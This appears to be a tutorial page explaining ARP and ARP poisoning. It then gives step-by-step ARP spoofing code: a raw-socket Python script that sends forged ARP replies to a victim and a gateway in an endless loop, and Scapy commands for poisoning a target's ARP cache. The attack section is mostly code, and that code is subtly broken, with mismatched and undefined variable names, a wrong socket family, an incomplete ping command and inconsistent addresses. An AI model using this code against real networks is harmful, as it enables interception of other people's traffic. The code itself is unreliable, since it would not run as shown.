ARP may be defined as a stateless protocol which is used for mapping Internet Protocol (IP) addresses to a physical machine addresses.
In this section, we will learn about the working of ARP. Consider the following steps to understand how ARP works −
Step 1 − First, when a machine wants to communicate with another it must look up to its ARP table for physical address.
Step 2 − If it finds the physical address of the machine, the packet after converting to its right length, will be sent to the desired machine
Step 3 − But if no entry is found for the IP address in the table, the ARP_request will be broadcast over the network.
Step 4 − Now, all the machines on the network will compare the broadcasted IP address to MAC address and if any of the machines in the network identifies the address, it will respond to the ARP_request along with its IP and MAC address. Such ARP message is called ARP_reply.
Step 5 − At last, the machine that sends the request will store the address pair in its ARP table and the whole communication will take place.
It may be defined as a type of attack where a malicious actor is sending a forged ARP request over the local area network. ARP Poisoning is also known as ARP Spoofing. It can be understood with the help of the following points −
First ARP spoofing, for overloading the switch, will constructs a huge number of falsified ARP request and reply packets.
Then the switch will be set in forwarding mode.
Now, the ARP table would be flooded with spoofed ARP responses, so that the attackers can sniff all network packets.
In this section, we will understand Python implementation of ARP spoofing. For this, we need three MAC addresses — first of the victim, second of the attacker and third of the gateway. Along with that, we also need to use the code of ARP protocol.
Let us import the required modules as follows −
import socket import struct import binascii
Now, we will create a socket, which will have three parameters. The first parameter tells us about the packet interface (PF_PACKET for Linux specific and AF_INET for windows), the second parameter tells us if it is a raw socket and the third parameter tells us about the protocol we are interested in (here 0x0800 used for IP protocol).
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800)) s.bind(("eth0",socket.htons(0x0800)))
We will now provide the mac address of attacker, victim and gateway machine −
attckrmac = '\x00\x0c\x29\x4f\x8e\x76' victimmac ='\x00\x0C\x29\x2E\x84\x5A' gatewaymac = '\x00\x50\x56\xC0\x00\x28'
We need to give the code of ARP protocol as shown −
Two Ethernet packets, one for victim machine and another for gateway machine have been crafted as follows −
ethernet1 = victimmac + attckmac + code ethernet2 = gatewaymac + attckmac + code
The following lines of code are in order as per accordance with the ARP header −
htype = '\x00\x01' protype = '\x08\x00' hsize = '\x06' psize = '\x04' opcode = '\x00\x02'
Now we need to give the IP addresses of the gateway machine and victim machines (Let us assume we have following IP addresses for gateway and victim machines) −
gateway_ip = '192.168.43.85' victim_ip = '192.168.43.131'
Convert the above IP addresses to hexadecimal format with the help of the socket.inet_aton() method.
gatewayip = socket.inet_aton ( gateway_ip ) victimip = socket.inet_aton ( victim_ip )
Execute the following line of code to change the IP address of gateway machine.
victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip gateway_ARP = ethernet2 + htype + protype + hsize + psize +opcode + attckmac + victimip + gatewaymac + gatewayip while 1: s.send(victim_ARP) s.send(gateway_ARP)
ARP spoofing can be implemented using Scapy on Kali Linux. Follow these steps to perform the same −
In this step, we will find the IP address of the attacker machine by running the command ifconfig on the command prompt of Kali Linux.
In this step, we will find the IP address of the target machine by running the command ifconfig on the command prompt of Kali Linux, which we need to open on another virtual machine.
In this step, we need to ping the target machine from the attacker machine with the help of following command −
Ping –c 192.168.43.85(say IP address of target machine)
We already know that two machines use ARP packets to exchange MAC addresses hence after step 3, we can run the following command on the target machine to see the ARP cache −
We can create ARP packets with the help of Scapy as follows −
scapy arp_packt = ARP() arp_packt.display()
We can send malicious ARP packets with the help of Scapy as follows −
arp_packt.pdst = “192.168.43.85”(say IP address of target machine) arp_packt.hwsrc = “11:11:11:11:11:11” arp_packt.psrc = ”22.214.171.124” arp_packt.hwdst = “ff:ff:ff:ff:ff:ff” send(arp_packt)
Step 7: Again check ARP cache on target machine
Now if we will again check ARP cache on target machine then we will see the fake address ‘126.96.36.199’.